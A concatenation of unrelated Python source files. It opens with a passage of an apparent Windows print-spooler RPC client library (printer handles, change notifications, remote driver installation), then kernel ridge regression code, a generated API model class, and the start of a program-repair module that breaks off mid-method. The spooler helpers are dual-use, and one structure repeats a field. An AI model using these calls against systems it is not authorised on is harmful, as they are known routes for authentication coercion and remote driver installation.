PRINTER_ENUM_LOCAL = 0x00000002
PRINTER_ENUM_CONNECTIONS = 0x00000004
PRINTER_ENUM_NAME = 0x00000008
PRINTER_ENUM_REMOTE = 0x00000010
PRINTER_ENUM_SHARED = 0x00000020
PRINTER_ENUM_NETWORK = 0x00000040
PRINTER_ENUM_EXPAND = 0x00004000
PRINTER_ENUM_CONTAINER = 0x00008000
PRINTER_ENUM_ICON1 = 0x00010000
PRINTER_ENUM_ICON2 = 0x00020000
PRINTER_ENUM_ICON3 = 0x00040000
PRINTER_ENUM_ICON8 = 0x00800000
PRINTER_ENUM_HIDE = 0x01000000
# 2.2.3.8 Printer Notification Values
PRINTER_NOTIFY_CATEGORY_2D = 0x00000000
PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
PRINTER_NOTIFY_CATEGORY_3D = 0x00020000
# 3.1.4.4.8 RpcAddPrinterDriverEx Values
APD_STRICT_UPGRADE = 0x00000001
APD_STRICT_DOWNGRADE = 0x00000002
APD_COPY_ALL_FILES = 0x00000004
APD_COPY_NEW_FILES = 0x00000008
APD_COPY_FROM_DIRECTORY = 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 0x00002000
APD_INSTALL_WARNED_DRIVER = 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000
################################################################################
# STRUCTURES
################################################################################
# 2.2.1.1.4 PRINTER_HANDLE
class PRINTER_HANDLE(NDRSTRUCT):
structure = (
('Data','20s=b""'),
)
def getAlignment(self):
if self._isNDR64 is True:
return 8
else:
return 4
# 2.2.1.2.1 DEVMODE_CONTAINER
class BYTE_ARRAY(NDRUniConformantArray):
item = 'c'
class PBYTE_ARRAY(NDRPOINTER):
referent = (
('Data', BYTE_ARRAY),
)
class DEVMODE_CONTAINER(NDRSTRUCT):
structure = (
('cbBuf',DWORD),
('pDevMode',PBYTE_ARRAY),
)
# 2.2.1.11.1 SPLCLIENT_INFO_1
class SPLCLIENT_INFO_1(NDRSTRUCT):
structure = (
('dwSize',DWORD),
('pMachineName',LPWSTR),
('pUserName',LPWSTR),
('dwBuildNum',DWORD),
('dwMajorVersion',DWORD),
('dwMinorVersion',DWORD),
('wProcessorArchitecture',USHORT),
)
class PSPLCLIENT_INFO_1(NDRPOINTER):
referent = (
('Data', SPLCLIENT_INFO_1),
)
# 2.2.1.11.2 SPLCLIENT_INFO_2
class SPLCLIENT_INFO_2(NDRSTRUCT):
structure = (
('notUsed',ULONGLONG),
)
class PSPLCLIENT_INFO_2(NDRPOINTER):
referent = (
('Data', SPLCLIENT_INFO_2),
)
# 2.2.1.11.3 SPLCLIENT_INFO_3
class SPLCLIENT_INFO_3(NDRSTRUCT):
structure = (
('cbSize',UINT),
('dwFlags',DWORD),
('dwFlags',DWORD),
('pMachineName',LPWSTR),
('pUserName',LPWSTR),
('dwBuildNum',DWORD),
('dwMajorVersion',DWORD),
('dwMinorVersion',DWORD),
('wProcessorArchitecture',USHORT),
('hSplPrinter',ULONGLONG),
)
class PSPLCLIENT_INFO_3(NDRPOINTER):
referent = (
('Data', SPLCLIENT_INFO_3),
)
# 2.2.1.5.1 DRIVER_INFO_1
class DRIVER_INFO_1(NDRSTRUCT):
structure = (
('pName', STRING_HANDLE ),
)
class PDRIVER_INFO_1(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_1),
)
# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName', LPWSTR),
('pEnvironment', LPWSTR),
('pDriverPath', LPWSTR),
('pDataFile', LPWSTR),
('pConfigFile', LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_2),
)
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
1 : ('pNotUsed', PDRIVER_INFO_1),
2 : ('Level2', PDRIVER_INFO_2),
}
class DRIVER_CONTAINER(NDRSTRUCT):
structure = (
('Level',DWORD),
('DriverInfo',DRIVER_INFO_UNION),
)
# 2.2.1.2.14 SPLCLIENT_CONTAINER
class CLIENT_INFO_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
}
class SPLCLIENT_CONTAINER(NDRSTRUCT):
structure = (
('Level',DWORD),
('ClientInfo',CLIENT_INFO_UNION),
)
# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
class USHORT_ARRAY(NDRUniConformantArray):
item = '<H'
class PUSHORT_ARRAY(NDRPOINTER):
referent = (
('Data', USHORT_ARRAY),
)
class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
structure = (
('Type',USHORT),
('Reserved0',USHORT),
('Reserved1',DWORD),
('Reserved2',DWORD),
('Count',DWORD),
('pFields',PUSHORT_ARRAY),
)
class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
referent = (
('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
)
# 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS
class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
structure = (
('Version',DWORD),
('Reserved',DWORD),
('Count',DWORD),
('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
)
class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
referent = (
('Data', RPC_V2_NOTIFY_OPTIONS),
)
################################################################################
# RPC CALLS
################################################################################
# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
class RpcEnumPrinters(NDRCALL):
opnum = 0
structure = (
('Flags', DWORD),
('Name', STRING_HANDLE),
('Level', DWORD),
('pPrinterEnum', PBYTE_ARRAY),
('cbBuf', DWORD),
)
class RpcEnumPrintersResponse(NDRCALL):
structure = (
('pPrinterEnum', PBYTE_ARRAY),
('pcbNeeded', DWORD),
('pcReturned', DWORD),
('ErrorCode', ULONG),
)
# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
class RpcOpenPrinter(NDRCALL):
opnum = 1
structure = (
('pPrinterName', STRING_HANDLE),
('pDatatype', LPWSTR),
('pDevModeContainer', DEVMODE_CONTAINER),
('AccessRequired', DWORD),
)
class RpcOpenPrinterResponse(NDRCALL):
structure = (
('pHandle', PRINTER_HANDLE),
('ErrorCode', ULONG),
)
# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
class RpcClosePrinter(NDRCALL):
opnum = 29
structure = (
('phPrinter', PRINTER_HANDLE),
)
class RpcClosePrinterResponse(NDRCALL):
structure = (
('phPrinter', PRINTER_HANDLE),
('ErrorCode', ULONG),
)
# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
opnum = 65
structure = (
('hPrinter', PRINTER_HANDLE),
('fdwFlags', DWORD),
('fdwOptions', DWORD),
('pszLocalMachine', LPWSTR),
('dwPrinterLocal', DWORD),
('pOptions', PRPC_V2_NOTIFY_OPTIONS),
)
class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
class RpcOpenPrinterEx(NDRCALL):
opnum = 69
structure = (
('pPrinterName', STRING_HANDLE),
('pDatatype', LPWSTR),
('pDevModeContainer', DEVMODE_CONTAINER),
('AccessRequired', DWORD),
('pClientInfo', SPLCLIENT_CONTAINER),
)
class RpcOpenPrinterExResponse(NDRCALL):
structure = (
('pHandle', PRINTER_HANDLE),
('ErrorCode', ULONG),
)
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
opnum = 89
structure = (
('pName', STRING_HANDLE),
('pDriverContainer', DRIVER_CONTAINER),
('dwFileCopyFlags', DWORD),
)
class RpcAddPrinterDriverExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (RpcEnumPrinters, RpcEnumPrintersResponse),
1 : (RpcOpenPrinter, RpcOpenPrinterResponse),
29 : (RpcClosePrinter, RpcClosePrinterResponse),
65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
################################################################################
# HELPER FUNCTIONS
################################################################################
def checkNullString(string):
if string == NULL:
return string
if string[-1:] != '\x00':
return string + '\x00'
else:
return string
def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
"""
RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx
:param DCERPC_v5 dce: a connected DCE instance.
:param string printerName: A string for a printer connection, printer object, server object, job object, port
object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
(IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
call (RPC) binds to, and it MUST uniquely identify a print server on the network.
:param string pDatatype: A string that specifies the data type to be associated with the printer handle.
:param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
:param int accessRequired: The access level that the client requires for interacting with the object to which a
handle is being opened.
:return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
"""
request = RpcOpenPrinter()
request['pPrinterName'] = checkNullString(printerName)
request['pDatatype'] = pDatatype
if pDevModeContainer is NULL:
request['pDevModeContainer']['pDevMode'] = NULL
else:
request['pDevModeContainer'] = pDevModeContainer
request['AccessRequired'] = accessRequired
return dce.request(request)
def hRpcClosePrinter(dce, phPrinter):
"""
RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx
:param DCERPC_v5 dce: a connected DCE instance.
:param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.
:return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
"""
request = RpcClosePrinter()
request['phPrinter'] = phPrinter
return dce.request(request)
def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
pClientInfo=NULL):
"""
RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx
:param DCERPC_v5 dce: a connected DCE instance.
:param string printerName: A string for a printer connection, printer object, server object, job object, port
object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
(IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
call (RPC) binds to, and it MUST uniquely identify a print server on the network.
:param string pDatatype: A string that specifies the data type to be associated with the printer handle.
:param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
:param int accessRequired: The access level that the client requires for interacting with the object to which a
handle is being opened.
:param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.
:return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
"""
request = RpcOpenPrinterEx()
request['pPrinterName'] = checkNullString(printerName)
request['pDatatype'] = pDatatype
if pDevModeContainer is NULL:
request['pDevModeContainer']['pDevMode'] = NULL
else:
request['pDevModeContainer'] = pDevModeContainer
request['AccessRequired'] = accessRequired
if pClientInfo is NULL:
raise Exception('pClientInfo cannot be NULL')
request['pClientInfo'] = pClientInfo
return dce.request(request)
def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
dwPrinterLocal=0, pOptions=NULL):
"""
creates a remote change notification object that monitors changes to printer objects and sends change notifications
to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx
:param DCERPC_v5 dce: a connected DCE instance.
:param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
:param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
:param int fdwOptions: The category of printers for which change notifications are returned.
:param string pszLocalMachine: A string that represents the name of the client computer.
:param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
:param RPC_V2_NOTIFY_OPTIONS pOptions: An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.
:return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
"""
request = RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = hPrinter
request['fdwFlags'] = fdwFlags
request['fdwOptions'] = fdwOptions
request['dwPrinterLocal'] = dwPrinterLocal
if pszLocalMachine is NULL:
raise Exception('pszLocalMachine cannot be NULL')
request['pszLocalMachine'] = checkNullString(pszLocalMachine)
request['pOptions'] = pOptions
return dce.request(request)
def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
"""
RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx
:param DCERPC_v5 dce: a connected DCE instance.
:param int flags: The types of print objects that this method enumerates. The value of this parameter is the
result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
:param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
:param level: The level of printer information structure.
:return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
"""
request = RpcEnumPrinters()
request['Flags'] = flags
request['Name'] = name
request['pPrinterEnum'] = NULL
request['Level'] = level
bytesNeeded = 0
try:
dce.request(request)
except DCERPCSessionError as e:
if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
raise
bytesNeeded = e.get_packet()['pcbNeeded']
request = RpcEnumPrinters()
request['Flags'] = flags
request['Name'] = name
request['Level'] = level
request['cbBuf'] = bytesNeeded
request['pPrinterEnum'] = b'a' * bytesNeeded
return dce.request(request)
def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
"""
RpcAddPrinterDriverEx installs a printer driver on the print server
Full Documentation: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b
:param DCERPC_v5 dce: a connected DCE instance.
:param pName
:param pDriverContainer
:param dwFileCopyFlags
:return: raises DCERPCSessionError on error.
"""
request = RpcAddPrinterDriverEx()
request['pName'] = checkNullString(pName)
request['pDriverContainer'] = pDriverContainer
request['dwFileCopyFlags'] = dwFileCopyFlags
#return request
return dce.request(request)
|
<gh_stars>1-10
import numpy as np
from kernellib.kernel_approximation import RandomizedNystrom, RandomFourierFeatures, FastFood
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.kernel_approximation import Nystroem, RBFSampler
from sklearn.utils import check_array, check_X_y, check_random_state
from sklearn.utils.validation import check_is_fitted
from scipy.linalg import cholesky, cho_solve, solve
from sklearn.linear_model.ridge import _solve_cholesky_kernel
class RKSKernelRidge(BaseEstimator, RegressorMixin):
"""Random Kitchen Sinks Kernel Approximation.
Author: <NAME>
Email : <EMAIL>
<EMAIL>
Date : 3rd - August, 2018
"""
def __init__(self, n_components=10, alpha=1e-3, sigma=1.0,
random_state=None):
self.n_components = n_components
self.alpha = alpha
self.sigma = sigma
self.random_state = random_state
def fit(self, X, y):
"""Fits the Random Kitchen Sinks Kernel Ridge Regression Model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target Values
sample_weight : float or array-like of shape [n_samples]
Individual weights for each sample, ignored if None is passed.
Returns
-------
self : returns an instance of self
"""
# Convert the data
X, y = check_X_y(X, y, accept_sparse=("csr", "csc"), multi_output=True,
y_numeric=True)
# iniate randomization
rng = check_random_state(self.random_state)
# Generate n_components iid samples (Random Projection Matrix)
self.w = np.sqrt(1 / (self.sigma**2)) * rng.randn(self.n_components, X.shape[1])
# Explicitly project the features
self.L = np.exp(1j * np.dot(X, self.w.T))
# Calculate the Kernel Matrix
K = np.dot(self.L.T, self.L) + self.alpha * np.eye(self.n_components)
ravel = False
if len(y.shape) == 1:
y = y.reshape(-1, 1)
ravel = True
#
# self.dual_coef_ = _solve_cholesky_kernel(K, np.dot(self.L.T, y), alpha)
#
# if ravel:
# self.dual_coef_ = self.dual_coef_.ravel()
self.dual_coef_ = np.linalg.solve(K , np.dot(self.L.T, y))
if ravel:
self.dual_coef_ = self.dual_coef_.ravel()
self.X_fit_ = X
return self
def predict(self, X, return_real=True):
"""Predict using the RKS Kernel Model
"""
check_is_fitted(self, ["X_fit_", "dual_coef_"])
X = check_array(X)
K = np.exp(1j * np.dot(X, self.w.T))
if return_real:
return np.real(np.dot(K, self.dual_coef_))
else:
return np.dot(K, self.dual_coef_)
class KernelRidge(BaseEstimator, RegressorMixin):
"""Kernel Ridge Regression with kernel Approximations.
Large scale
Parameters
----------
alpha : {float},
The noise parameter for the outputs according to the KRR
formulation.
n_components : int, default=10
The number of components (subset) to keep from the original
data.
sigma : float, default=None
The length scale parameter
Author: <NAME>
Email : <EMAIL>
<EMAIL>
Date : 3rd - August, 2018
"""
def __init__(self, n_components=10, alpha=1e-3, sigma=None,
random_state=None, approximation='nystrom',
k_rank=10, kernel='rbf', trade_off='acc'):
self.n_components = n_components
self.alpha = alpha
self.sigma = sigma
self.random_state = random_state
self.approximation = approximation
self.k_rank = k_rank
self.n_components = n_components
self.kernel = kernel
self.trade_off = trade_off
def fit(self, X, y):
# Convert the data
X, y = check_X_y(X, y, accept_sparse=("csr", "csc"), multi_output=True,
y_numeric=True)
# iniate randomization
rng = check_random_state(self.random_state)
# Sigma
if self.sigma is None:
self.sigma = 1.0
# Kernel Approximation Step
self.L = self._kernel_approximation(X)
# Solve for weights
K = np.dot(self.L.T, self.L)
alpha = np.atleast_1d(self.alpha)
ravel = False
if len(y.shape) == 1:
y = y.reshape(-1, 1)
ravel = True
if self.approximation == 'rnystrom':
self.dual_coef_ = solve(K + alpha * np.eye(K.shape[0]), np.dot(self.L.T, y))
else:
self.dual_coef_ = _solve_cholesky_kernel(K, np.dot(self.L.T, y), alpha)
if ravel:
self.dual_coef_ = self.dual_coef_.ravel()
self.X_fit_ = X
return self
def _kernel_approximation(self, X):
# Random Fourier Features
if self.approximation == 'rff':
self.trans = RandomFourierFeatures(
n_components=self.n_components,
gamma=1 / np.sqrt(2 * self.sigma**2)
)
# RBF Sampler (Variant of Random Kitchen Sinks)
elif self.approximation == 'rks':
self.trans = RBFSampler(
gamma=1 / np.sqrt(2 * self.sigma**2),
n_components=self.n_components,
random_state=self.random_state)
# Nystrom Approximation
elif self.approximation == 'nystrom':
self.trans = Nystroem(
kernel=self.kernel,
gamma=1 / np.sqrt(2 * self.sigma**2),
n_components=self.n_components,
random_state=self.random_state
)
# Fast Food Approximation
elif self.approximation == 'fastfood':
self.trans = FastFood(
sigma=self.sigma,
n_components=self.n_components,
tradeoff_mem_accuracy=self.trade_off,
random_state=self.random_state
)
# Randomized Nystrom Approximation
elif self.approximation == 'rnystrom':
self.trans = RandomizedNystrom(
kernel=self.kernel,
sigma=self.sigma,
n_components=self.n_components,
k_rank=self.k_rank,
random_state=self.random_state
)
else:
raise ValueError('Unrecognized algorithm.')
self.trans.fit(X)
return self.trans.transform(X)
def predict(self, X):
"""Predict using the kernel ridge model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Samples.
Returns
-------
Predictions : array, shape = [n_samples] or [n_samples, n_targets]
Returns predicted values.
"""
check_is_fitted(self, ["X_fit_", "dual_coef_"])
X = check_array(X)
K = self.trans.transform(X)
return np.real(np.dot(K, self.dual_coef_))
|
# coding: utf-8
"""
EXACT - API
API to interact with the EXACT Server # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
from enum import Enum, IntEnum
import six
class Image(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
class ImageSourceTypes(IntEnum):
DEFAULT = 0
SERVER_GENERATED = 1
FILE_LINK = 2
swagger_types = {
'id': 'int',
'name': 'str',
'filename': 'str',
'time': 'datetime',
'height': 'int',
'width': 'int',
'mpp': 'float',
'objective_power': 'float',
'image_type': 'int',
'image_set': 'int',
'annotations': 'list[int]'
}
attribute_map = {
'id': 'id',
'name': 'name',
'filename': 'filename',
'time': 'time',
'height': 'height',
'width': 'width',
'mpp': 'mpp',
'objective_power': 'objectivePower',
'image_type': 'image_type',
'image_set': 'image_set',
'annotations': 'annotations'
}
def __init__(self, id=None, name=None, filename=None, time=None, height=None, width=None, mpp=None, objective_power=None, image_type=None, image_set=None, annotations=None): # noqa: E501
"""Image - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._filename = None
self._time = None
self._height = None
self._width = None
self._mpp = None
self._objective_power = None
self._image_type = None
self._image_set = None
self._annotations = None
self.discriminator = None
if id is not None:
self.id = id
self.name = name
self.filename = filename
if time is not None:
self.time = time
if height is not None:
self.height = height
if width is not None:
self.width = width
if mpp is not None:
self.mpp = mpp
if objective_power is not None:
self.objective_power = objective_power
if image_type is not None:
self.image_type = image_type
self.image_set = image_set
self.annotations = annotations
@property
def id(self):
"""Gets the id of this Image. # noqa: E501
:return: The id of this Image. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Image.
:param id: The id of this Image. # noqa: E501
:type: int
"""
self._id = id
@property
def name(self):
"""Gets the name of this Image. # noqa: E501
:return: The name of this Image. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Image.
:param name: The name of this Image. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def filename(self):
"""Gets the filename of this Image. # noqa: E501
:return: The filename of this Image. # noqa: E501
:rtype: str
"""
return self._filename
@filename.setter
def filename(self, filename):
"""Sets the filename of this Image.
:param filename: The filename of this Image. # noqa: E501
:type: str
"""
if filename is None:
raise ValueError("Invalid value for `filename`, must not be `None`") # noqa: E501
self._filename = filename
@property
def time(self):
"""Gets the time of this Image. # noqa: E501
:return: The time of this Image. # noqa: E501
:rtype: datetime
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this Image.
:param time: The time of this Image. # noqa: E501
:type: datetime
"""
self._time = time
@property
def height(self):
"""Gets the height of this Image. # noqa: E501
:return: The height of this Image. # noqa: E501
:rtype: int
"""
return self._height
@height.setter
def height(self, height):
"""Sets the height of this Image.
:param height: The height of this Image. # noqa: E501
:type: int
"""
self._height = height
@property
def width(self):
"""Gets the width of this Image. # noqa: E501
:return: The width of this Image. # noqa: E501
:rtype: int
"""
return self._width
@width.setter
def width(self, width):
"""Sets the width of this Image.
:param width: The width of this Image. # noqa: E501
:type: int
"""
self._width = width
@property
def mpp(self):
"""Gets the mpp of this Image. # noqa: E501
:return: The mpp of this Image. # noqa: E501
:rtype: float
"""
return self._mpp
@mpp.setter
def mpp(self, mpp):
"""Sets the mpp of this Image.
:param mpp: The mpp of this Image. # noqa: E501
:type: float
"""
self._mpp = mpp
@property
def objective_power(self):
"""Gets the objective_power of this Image. # noqa: E501
:return: The objective_power of this Image. # noqa: E501
:rtype: float
"""
return self._objective_power
@objective_power.setter
def objective_power(self, objective_power):
"""Sets the objective_power of this Image.
:param objective_power: The objective_power of this Image. # noqa: E501
:type: float
"""
self._objective_power = objective_power
@property
def image_type(self):
"""Gets the image_type of this Image. # noqa: E501
:return: The image_type of this Image. # noqa: E501
:rtype: float
"""
return self._image_type
@image_type.setter
def image_type(self, image_type):
"""Sets the image_type of this Image.
:param image_type: The image_type of this Image. # noqa: E501
:type: float
"""
self._image_type = image_type
@property
def image_set(self):
"""Gets the image_set of this Image. # noqa: E501
:return: The image_set of this Image. # noqa: E501
:rtype: int
"""
return self._image_set
@image_set.setter
def image_set(self, image_set):
"""Sets the image_set of this Image.
:param image_set: The image_set of this Image. # noqa: E501
:type: int
"""
if image_set is None:
image_set = "image_set not load please remove omit=image_set"
#if image_set is None:
# raise ValueError("Invalid value for `image_set`, must not be `None`") # noqa: E501
self._image_set = image_set
@property
def annotations(self):
"""Gets the annotations of this Image. # noqa: E501
:return: The annotations of this Image. # noqa: E501
:rtype: list[int]
"""
return self._annotations
@annotations.setter
def annotations(self, annotations):
"""Sets the annotations of this Image.
:param annotations: The annotations of this Image. # noqa: E501
:type: list[int]
"""
if annotations is None:
annotations = "Annotations not load please remove omit=annotations"
# raise ValueError("Invalid value for `annotations`, must not be `None`") # noqa: E501
self._annotations = annotations
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Image, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Image):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
<filename>src/repair/guided_inference.py
import logging
import numpy as np
import scipy as sc
import pymc3 as pm
import os
from symbolic_inference import SymbolicInferrer
from os.path import join
from os import mkdir
import time
import statistics
import json
import subprocess
from runtime import Trace, TraceItem
from functools import reduce
from DD import DD
from bin_utils import Bin
from utils import DefectClass as DC
from utils import TraceInfo as TI
from z3 import Select, Concat, Array, BitVecSort, BitVecVal, Solver, BitVec
from typing import List, Tuple, Dict
from enum import Enum
from custom_types import Block, Sample, BitSeq, Proposal, \
Ebits, EBitsSeq, BlockEbits, Cost, Location, Loc, TestOut, \
Angel, AngelicPath, TraceFile
logger = logging.getLogger('guided_infer')
pymc3_logger = logging.getLogger('pymc3')
class ExtractionFailure(Exception):
pass
class LocDDFailure(Exception):
def __init__(self):
pass
class EbitsDDFailure(Exception):
def __init__(self, min_locs, min_init_ebits):
self.min_locs = min_locs
self.min_init_ebits = min_init_ebits
class AngelicValsFound(pm.StopSampling):
def __init__(self, trace_file, unique_trial, total_trial,
cost_seq, ratio_seq, accepted_seq):
self.trace_file = trace_file
self.unique_trial = unique_trial
self.total_trial = total_trial
self.cost_seq = cost_seq
self.ratio_seq = ratio_seq
self.accepted_seq = accepted_seq
class SampleSpaceExhausted(pm.StopSampling):
def __init__(self, sample_space_size, samples, unique_trial, total_trial,
cost_seq, ratio_seq, accepted_seq):
self.sample_space_size = sample_space_size
self.samples = samples
self.unique_trial = unique_trial
self.total_trial = total_trial
self.cost_seq = cost_seq
self.ratio_seq = ratio_seq
self.accepted_seq = accepted_seq
class Stuck(pm.StopSampling):
def __init__(self, cost, unique_trial, total_trial,
cost_seq, ratio_seq, accepted_seq):
self.cost = cost
self.unique_trial = unique_trial
self.total_trial = total_trial
self.cost_seq = cost_seq
self.ratio_seq = ratio_seq
self.accepted_seq = accepted_seq
class EbitsOverFlow(pm.StopSampling):
def __init__(self, ebits, last_sample, unique_trial, total_trial,
cost_seq, ratio_seq, accepted_seq):
self.ebits = ebits
self.last_sample = last_sample
self.unique_trial = unique_trial
self.total_trial = total_trial
self.cost_seq = cost_seq
self.ratio_seq = ratio_seq
self.accepted_seq = accepted_seq
class TrialsExhausted(pm.StopSampling):
def __init__(self, unique_trial, total_trial,
cost_seq, ratio_seq, accepted_seq):
self.unique_trial = unique_trial
self.total_trial = total_trial
self.cost_seq = cost_seq
self.ratio_seq = ratio_seq
self.accepted_seq = accepted_seq
class ChunkOverFlow(Exception):
def __init__(self, ebits):
self.ebits = ebits
class CustomProposal:
"""
s: markov chain
"""
def __init__(self, kwargs):
self.project = kwargs['project']
self.test = kwargs['test']
self.locations = kwargs['locations']
self.working_dir = kwargs['working_dir']
self.searchDir = kwargs['searchDir']
self.one_bit_flip_prob = kwargs['one_bit_flip_prob']
self.mul_bits_flip_prob = kwargs['mul_bits_flip_prob']
self.inferrer = kwargs['inferrer']
self.config = kwargs['config']
self.environment = dict(os.environ)
"""
q0: the current (padded) flattened value
e.g. if the original sample is [array([0,1]), array([1,0])], then
q0 becomes array([0, 1, 1, 0])
return: proposed value
"""
def __call__(self, q0):
# logger.debug('[CustomProposal] q0: {}'.format(q0))
q0 = q0.astype('int64')
# q0: a flattened 1-d array. This is a concatenation of all chunks.
# With q0, there is no distinction between locations.
# e.g., array([ 0, 2046, 0, 0])
#
# q0_chunks: q0 is split into arrays where each array represents the bitvector for
# a distinct location.
